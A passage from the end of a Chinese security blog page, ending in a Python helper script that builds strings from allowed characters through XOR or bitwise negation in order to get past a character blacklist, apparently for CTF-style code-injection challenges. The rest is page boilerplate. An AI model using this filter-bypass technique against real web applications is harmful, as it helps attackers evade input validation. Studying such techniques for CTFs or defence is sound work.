class="hljs-number">0</span>,<span class="hljs-built_in">len</span>(result)):<br>        <span class="hljs-keyword">if</span>(<span class="hljs-built_in">len</span>(result[i])==<span class="hljs-number">0</span>):<br>            <span class="hljs-keyword">return</span>(<span class="hljs-string">&quot;该字符在现有黑名单下无法拼接出-&gt;%s&quot;</span>%(rawstr[i]))<br>    <span class="hljs-built_in">print</span>(result)<br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">0</span>,<span class="hljs-built_in">len</span>(rawstr)):<br>        finalstr=finalstr[:finalstr.rfind(<span class="hljs-string">&#x27;&quot;&#x27;</span>,<span class="hljs-number">0</span>)]+result[i][<span class="hljs-number">0</span>]+finalstr[finalstr.rfind(<span class="hljs-string">&#x27;&quot;&#x27;</span>,<span class="hljs-number">0</span>):]<br>    <span class="hljs-keyword">return</span>(finalstr)<br><span class="hljs-keyword">while</span>(<span class="hljs-literal">True</span>):<br>    operationEffient=<span class="hljs-literal">True</span><br>    target=<span class="hljs-built_in">input</span>(<span class="hljs-string">&quot;请输入待转换字符\n&quot;</span>)<br>    <span class="hljs-keyword">while</span>(operationEffient):<br>        operation=<span class="hljs-built_in">input</span>(<span class="hljs-string">&quot;请选择操作\n1-&gt;使用异或拼接\n2-&gt;使用取反获得\n&quot;</span>)<br>        <span class="hljs-keyword">if</span>(operation==<span class="hljs-string">&quot;1&quot;</span>):<br>            result=yiHuo(target)<br>            <span class="hljs-keyword">pass</span><br>        <span class="hljs-keyword">elif</span>(operation==<span class="hljs-string">&quot;2&quot;</span>):<br>            result=quFan(target)<br>            <span class="hljs-keyword">pass</span><br>        <span class="hljs-keyword">else</span>:<br>            <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;选择的操作无效&quot;</span>)<br>            <span class="hljs-keyword">continue</span><br>        <span class="hljs-built_in">print</span>(result)<br></code></pre></td></tr></table></figure>












      
       <hr><span style="font-style: italic;color: gray;"> 转载请注明来源，欢迎对文章中的引用来源进行考证，欢迎指出任何有错误或不够清晰的表达。 </span>
    </div>
</article>





    <div id="comments">
    <script>
        {
            const comments = document.getElementById("comments");
            const script = document.createElement("script");
            script.src = "https://giscus.app/client.js";
            script.setAttribute('data-repo', "MIXBP/MIXBP.github.io");
            script.setAttribute('data-repo-id', "R_kgDONYaZsg");
            script.setAttribute('data-category', "Announcements");
            script.setAttribute('data-category-id', "DIC_kwDONYaZss4ClAnT");
            script.setAttribute('data-mapping', "pathname");
            script.setAttribute('data-strict', "0");
            script.setAttribute('data-reactions-enabled', "1");
            script.setAttribute('data-emit-metadata', "0");
            script.setAttribute('data-input-position', "top");
            script.setAttribute('data-theme', "noborder_dark");
            script.setAttribute('data-lang', "zh-CN");
            script.setAttribute('data-loading', "lazy");
            script.setAttribute('crossorigin', "anonymous");
            script.setAttribute('async', "");
            comments.appendChild(script);
        }
    </script>
</div>



    




    </div>
    <div class="copyright">
        <p class="footer-entry">
    ©MIXBP 2024
</p>
<p class="footer-entry">Built with <a href="https://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/yelog/hexo-theme-3-hexo" target="_blank">3-hexo</a> theme</p>

    </div>
    <div class="full-toc">
        <button class="full" data-title="Toggle full screen shortcut key s"><span class="min "></span></button>
<a class="" id="rocket" ></a>

    </div>
</div>

</body>
<script src="/js/jquery.pjax.js?v=1.1.0" ></script>

<script src="/js/script.js?v=1.1.0" ></script>
<script>
    var img_resize = 'default';
    function initArticle() {
        /*渲染对应的表格样式*/
        
            $("#post .pjax table").addClass("green_title");
        

        /*渲染打赏样式*/
        

        /*高亮代码块行号*/
        

        /*访问数量*/
        
        $.getScript("//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js");
        

        /*代码高亮，行号对齐*/
        $('.pre-numbering').css('line-height',$('.has-numbering').css('line-height'));

        
        
    }

    /*打赏页面隐藏与展示*/
    

</script>

<!--加入行号的高亮代码块样式-->

<!--自定义样式设置-->
<style>
    
    
    .nav {
        width: 542px;
    }
    .nav.fullscreen {
        margin-left: -542px;
    }
    .nav-left {
        width: 120px;
    }
    
    
    @media screen and (max-width: 1468px) {
        .nav {
            width: 492px;
        }
        .nav.fullscreen {
            margin-left: -492px;
        }
        .nav-left {
            width: 100px;
        }
    }
    
    
    @media screen and (max-width: 1024px) {
        .nav {
            width: 492px;
            margin-left: -492px
        }
        .nav.fullscreen {
            margin-left: 0;
        }
    }
    
    @media screen and (max-width: 426px) {
        .nav {
            width: 100%;
        }
        .nav-left {
            width: 100%;
        }
    }
    
    
    .nav-right .title-list nav a .post-title, .nav-right .title-list #local-search-result a .post-title {
        color: #383636;
    }
    
    
    .nav-right .title-list nav a .post-date, .nav-right .title-list #local-search-result a .post-date {
        color: #5e5e5f;
    }
    
    
    .nav-right nav a.hover, #local-search-result a.hover{
        background-color: #e2e0e0;
    }
    
    

    /*列表样式*/
    

    /* 背景图样式 */
    
    #post {
        background: url(/img/background.jpg);
    }
    
    
    #post .index {
        background: url(/img/background2.jpg);
    }
    


    /*引用块样式*/
    

    /*文章列表背景图*/
    
    .nav-right:before {
        content: ' ';
        display: block;
        position: absolute;
        left: 0;
        top: 0;
        width: 100%;
        height: 100%;
        opacity: 0.5;
        background: url("/img/bjtp.jpg");
        background-repeat: no-repeat;
        background-position: 50% 0;
        -ms-background-size: cover;
        -o-background-size: cover;
        -moz-background-size: cover;
        -webkit-background-size: cover;
        background-size: cover;
    }
    

    
</style>






<div class="mobile-menus-out" >

</div>
<div class="mobile-menus">
    
    
    
    <a class="dynamic-menu " target="_self"   href="https://mixbp.github.io/">MIXBP</a>
    
    
    <a class="dynamic-menu " target="_blank"  href="https://mixbp.github.io/">github</a>
    
</div>


</html>
